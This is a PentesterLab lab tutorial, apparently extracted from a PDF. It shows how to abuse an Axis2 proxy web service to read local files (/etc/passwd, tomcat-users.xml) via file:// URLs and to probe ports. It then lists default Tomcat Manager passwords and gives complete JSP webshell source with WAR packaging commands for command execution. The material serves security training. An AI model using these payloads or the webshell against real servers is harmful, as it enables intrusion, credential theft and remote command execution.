Axis2 and Tomcat Manager

AXIS2 AND TOMCAT MANAGERBy Louis Nyffenegger <[email protected]>

245566

88

10

1213151616

19192122232325

28

Table of Content

Table of ContentIntroductionAbout this exercise

LicenseSyntax of this courseThe web application

Tomcat and ApacheArchitectureRetrieving Tomcat version

Attacking Axis2Retrieving information from the WSDLCalling Axis2 services: the easy wayCalling Axis2 services: the hard wayJava URL class

Attacking the Tomcat ManagerIntroduction to the Tomcat ManagerDefault Manager's credentialsAccessing the Manager using the vulnerability found previouslyDeploying a WebShell

Building a WebShellDeploying a WebShell and Commands execution

Conclusion

2/28

PentesterLab.com » Axis2 and Tomcat Manager

3/28


Introduction

This course details the exploitation of an issue in an Axis2 Web service and howusing this issue it is possible to retrieve arbitrary files. Then using this, we will seehow an attacker can retrieve Tomcat users' file to access the Tomcat Manager andgain commands execution on the server.

4/28


About this exercise

License

This exercise by PentesterLab is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. To view a copy of this license, visithttp://creativecommons.org/licenses/by-nc-nd/3.0/.

5/28


https://www.pentesterlab.com/

http://creativecommons.org/licenses/by-nc-nd/3.0/

Syntax of this course

The red boxes provide information on mistakes/issues that are likely to happenwhile testing:

An issue that you may encounter...An issue that you may encounter...

The green boxes provide tips and information if you want to go further.

You should probably check...You should probably check...

The blue boxes are "homework": things you can work on once you are done withthis exercise:

You should probably work on...You should probably work on...

The web application

Once the system has booted, you can then retrieve the current IP address of thesystem using the command ifconfig:

6/28


$ ifconfig eth0eth0 Link encap:Ethernet HWaddr 52:54:00:12:34:56 inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0 inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:88 errors:0 dropped:0 overruns:0 frame:0 TX packets:77 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:10300 (10.0 KiB) TX bytes:10243 (10.0 KiB) Interrupt:11 Base address:0x8000

In this example the IP address is 10.0.2.15.

Throughout the training, the hostname vulnerable is used for the vulnerablemachine, you can either replace it by the IP address of the machine, or you can justadd an entry to your host file with this name and the corresponding IP address. Itcan be easily done by modifying:

on Windows, your C:\Windows\System32\Drivers\etc\hosts file;

on Unix/Linux and Mac OS X, your /etc/hosts file.

The IP address can change if you restart the system, don'tThe IP address can change if you restart the system, don'tforget to update your hosts file.forget to update your hosts file.

7/28


Tomcat and Apache

Architecture

On Unix/Linux systems, Tomcat cannot be run on port 80 unless you give rootaccess to the application server (Tomcat), which is not a good idea since Tomcatdoes not drop privileges and will be running as root (as opposed to Apache whichdrops privileges during startup). However, to be available from most users, theserver needs to be available on port 80, that is one of the reason people useApache to "proxy" the request to Tomcat. This configuration can also be used to:

serve static content directly from Apache and limit Tomcat's load;

load balance requests between two or more Tomcat servers.

8/28


The Apache and Tomcat servers can be on the same server or on different servers,this can be confusing once you gain commands execution on the Tomcat serverand realise that its configuration does not match what you see on the Apache's end.

There are two common ways to "proxy" requests from Apache to Tomcat:

http_proxy: the requests are forwarded to Tomcat using the HTTPprotocol;

ajp13: the requests are forwarded to Tomcat using the AJP13protocol. This configuration is used in this exercise using the Apachemodule mod_jk.

You should look into CVE-2007-0450 and CVE-2007-1860,You should look into CVE-2007-0450 and CVE-2007-1860,these vulnerabilities impact old versions of Tomcat/mod_jkthese vulnerabilities impact old versions of Tomcat/mod_jkand can potentially allow an attacker to gain access to theand can potentially allow an attacker to gain access to the

Tomcat Manager even if it is not directly exposed byTomcat Manager even if it is not directly exposed byApache.Apache.

Here, the page's title gives away that Tomcat is involved in this web stack, howeverthe HTTP headers only give information on the Apache server in front of it:

9/28


% telnet vulnerable 80Connected to vulnerable.Escape character is '̂ ]'.GET / HTTP/1.0

HTTP/1.1 200 OKDate: Wed, 26 Dec 2012 08:48:22 GMTServer: Apache/2.2.16 (Debian)[...]

Retrieving Tomcat version

It is always a good idea to retrieve the version of Tomcat to check if it is affected byany vulnerability. You can retrieve the version by accessing a non-existing pageand generate a 404 error page:

10/28


11/28


Attacking Axis2

Axis2 is a project from the Apache Foundation, it allows developer to create Webservices in C and in Java.

By default, Axis2 gets deployed in /axis2/ (when developers use axis2.war), youcan easily retrieve a list of the available services by visiting the pagehttp://vulnerable/axis2/services/listServices:

12/28


http://axis.apache.org/axis2/c/core/

http://axis.apache.org/axis2/java/core/

http://vulnerable/axis2/services/listServices

If we did not know that the server was hosting a Web service using Axis2, we couldtry to use a directory buster like wfuzz to find out. However, wfuzz's default wordlistsdon't contain axis2, that is why it is always a good idea to keep your own list withpaths of common applications and frameworks.

Retrieving information from the WSDL13/28


http://code.google.com/p/wfuzz/

The Web Services Description Language describes the functionalities offered by aweb service. A WSDL description of a web service (XML based) provides themethods that can be called, what parameters they expects and what values they willreturn.

The WSDL information can be accessed by clicking the service's name in the listServices page or directly using the following URL:http://vulnerable/axis2/services/ProxyService?wsdl.

You can find a list of methods by searching for the keyword operation in the portType section of the WSDL. In this file, we can see that only one operation isdefined (get):

[...]<wsdl:portType name="ProxyServicePortType"> <wsdl:operation name="get"> <wsdl:input message="tns:getRequest" wsaw:Action="urn:get"/> <wsdl:output message="tns:getResponse" wsaw:Action="urn:getResponse"/> </wsdl:operation></wsdl:portType>[...]

This operation is defined multiple times in the file for each different way to access it.We can see that this get operation uses a tns:getRequest and sends back a tns:getResponse. We are mostly interested by what the need to send to the service.

14/28


http://vulnerable/axis2/services/ProxyService?wsdl

Above the operation declaration, we can see that the getRequest used:

<wsdl:message name="getRequest"> <wsdl:part name="parameters" element="ns:get"/> </wsdl:message>

and that this value is declared above in the WSDL file as a parameter named uriand that this parameter is a string:

[...]<xs:element name="get"> <xs:complexType> <xs:sequence> <xs:element minOccurs="0" name="uri" nillable="true" type="xs:string"/> </xs:sequence> </xs:complexType></xs:element>[...]

Gathering this information is mostly a guess work and will depend on the WSDL filecreated by a given framework/tool, however we now have everything we need to callthe Web service.

Calling Axis2 services: the easy way

15/28


Axis2 provides an easy way to call Web services, you just need to follow the patternhttp://[WS_URL]/method?parameters. In our example, we can use this to call ourWeb service: http://vulnerable/axis2/services/ProxyService/get?uri=https://pentesterlab.com/. We can see that the return value is the homepage ofthe website PentesterLab.

Calling Axis2 services: the hard way

For complex Web services (like Web service with complex parameter types), it isbetter to generate a client using Axis2.

From my experience, it is often (always) better to use theFrom my experience, it is often (always) better to use thesame library used by the server to limit any problem ofsame library used by the server to limit any problem ofinteroperability between two libraries written in differentinteroperability between two libraries written in different

languages or using different specifications.languages or using different specifications.

You can find more information on how to generate a client using Axis2 by followingthe documentation on the Axis2 website:http://axis.apache.org/axis2/java/core/docs/userguide-creatingclients.html.

Java URL class

16/28


http://vulnerable/axis2/services/ProxyService/get?uri=https://pentesterlab.com/

https://pentesterlab.com/

https://pentesterlab.com/

http://axis.apache.org/axis2/java/core/docs/userguide-creatingclients.html

http://axis.apache.org/axis2/java/core/docs/userguide-creatingclients.html

We can see that this Web service uses the URL provided to retrieve content andechoes it back in the response. The easiest way to do that is the URL class in Java.We can probably use the URL class behaviour to get more than just a websitecontent...

The URL class can also be used as a port scanner if theThe URL class can also be used as a port scanner if thedeveloper didn't limit the ports you can have access to. Youdeveloper didn't limit the ports you can have access to. You

can try to accesscan try to accesshttp://vulnerable/axis2/services/ProxyService/get?http://vulnerable/axis2/services/ProxyService/get?

uri=http://localhost:22/uri=http://localhost:22/ to see what version of OpenSSH is to see what version of OpenSSH isused.used.

The Java URL class is a really handy class that allows a developer to fetch andretrieve content. This class supports the following protocols:

http://

https://

ftp://

file://

...

17/28


http://vulnerable/axis2/services/ProxyService/get?uri=http://localhost:22/

The first example is the most common use of this class and often used as a proxyto retrieve resources and bypass the same origin policy. The file:// is less knownand allow an attacker to retrieve arbitrary file on the file system (limited by theapplication server privileges).

We can exploit this behaviour to retrieve the /etc/passwd by accessing thefollowing URL http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/passwd and we can see the content of /etc/passwd in the response:

You should try to setup Apache and Tomcat using mod_jkYou should try to setup Apache and Tomcat using mod_jkand try to create a simple Axis2 HelloWorld Web service orand try to create a simple Axis2 HelloWorld Web service oran Axis2 Web service that returns the current time. You canan Axis2 Web service that returns the current time. You cancheck the configuration of Apache, Tomcat and Axis2 on thecheck the configuration of Apache, Tomcat and Axis2 on the

ISO to get an idea on how to do it.ISO to get an idea on how to do it.

18/28


http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/passwd

Attacking the Tomcat Manager

Introduction to the Tomcat Manager

The Tomcat Manager can be found at the following URL:http://vulnerable/manager/html.

Tomcat Manager is used to deploy web applications within Tomcat. TomcatManager is protected by a password and should not be installed on productionservers.

The file containing the password is named tomcat-users.xml and is stored inside $CATALINA_HOME/conf/ on most systems. This file looks like:

19/28


http://vulnerable/manager/html

<tomcat-users> <role rolename="manager-gui"/> <user username="tomcat" password="tomcat" roles="tomcat"/> <user username="admin" password="s3cret" roles="manager-gui"/></tomcat-users>

Debian has its own way of installing most software and tries to put configurationfiles in /etc. Tomcat installed through Debian's packaging system will follow thisrule and the file tomcat-users.xml will be stored in /etc/tomcat6/ (for the currentversion of Debian stable).

We can see here that users have a role, it's a really important part of the Managerapplication since you will need a user with the role manager (for version before6.0.30) or manager-gui (for later version) to access the manager and deploy anapplication. Other "manager" role can also be used but the deployment is morecomplex.

For example, if you login using tomcat with the password tomcat, you will get anHTTP 403 response:

20/28


Default Manager's credentials

In past versions of Tomcat, the Manager used to be shipped with default accounts.However, for obvious security reasons, the new version of Tomcat are not shippedwith default accounts (secure by default).

In the past, the following accounts were common:

21/28


Username Password

tomcat tomcat

admin

admin manager

admin password

admin s3cret

Accessing the Manager using the vulnerability foundpreviously

On Debian, by default, the tomcat-users.xml file is located in /etc/tomcat6, theversion retrieved previously confirms this. Using the vulnerability discovered in theAxis2 Web service, we can retrieve this file.

If the file was stored somewhere else, you can either bruteIf the file was stored somewhere else, you can either bruteforce the path or try to gather more information on theforce the path or try to gather more information on the

application to find where Tomcat is located on the system.application to find where Tomcat is located on the system.

22/28


By default on Debian, this file can only read by root and the member of the group tomcat6, but since the directory traversal gives us the same access as the tomcatserver, we can read the content of this file. It's possible to retrieve tomcat-users.xml by accessing the following URL:http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml. You can then retrieve the password of the manager user and access theTomcat Manager.

Deploying a WebShell

In this section, we are going to see how we can build and deploy a WebShell to gaincommand execution on the server.

Building a WebShell

To build a WebShell, we will need to write the WebShell and package it as a war file.To write the Webshell, we can either use JSP or Servlet. To keep things simple, weare going to build a JSP Webshell, the following code can be used:

23/28


http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml

<FORM METHOD=GET ACTION='index.jsp'><INPUT name='cmd' type=text><INPUT type=submit value='Run'></FORM><%@ page import="java.io.*" %><% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) { e.printStackTrace(); } }%><pre><%=output %></pre>

We can now create a directory name webshell and put our file (index.jsp) inside it:

$ mkdir webshell$ cp index.jsp webshell

Now we can build the war file using jar (provide with java):

24/28


$ cd webshell$ jar -cvf ../webshell.war *added manifestadding: index.jsp(in = 579) (out= 351)(deflated 39%)

Our webshell (webshell.war) is now packaged and we can upload it using theTomcat Manager.

Deploying a WebShell and Commands execution

To deploy the Webshell, you just need to select the war file you just created andupload it to the server using the Manager. The section of the page used to deploy anew web application allows you to directly select your war file:

25/28


Once the Webshell is deployed, you should see it in the Manager:

26/28


You just need to click the link to access it and you can start running arbitrarycommands:

27/28


Conclusion

This exercise explained how to get access to an Axis2 Web service and how theJava URL class can be used to retrieve arbitrary files if no checks are performed onthe protocol in use. Once you can retrieve arbitrary files, you can targetconfiguration files to gather sensitive information and passwords. Once you havecredentials, you can easily access the administration interface of the applicationserver and deploy a custom web application to run arbitrary commands on thesystem.

28/28


Date post:	21-Oct-2015
Category:	Documents
Upload:	badbit
View:	38 times
Download:	0 times

Axis2 and Tomcat Manager

Documents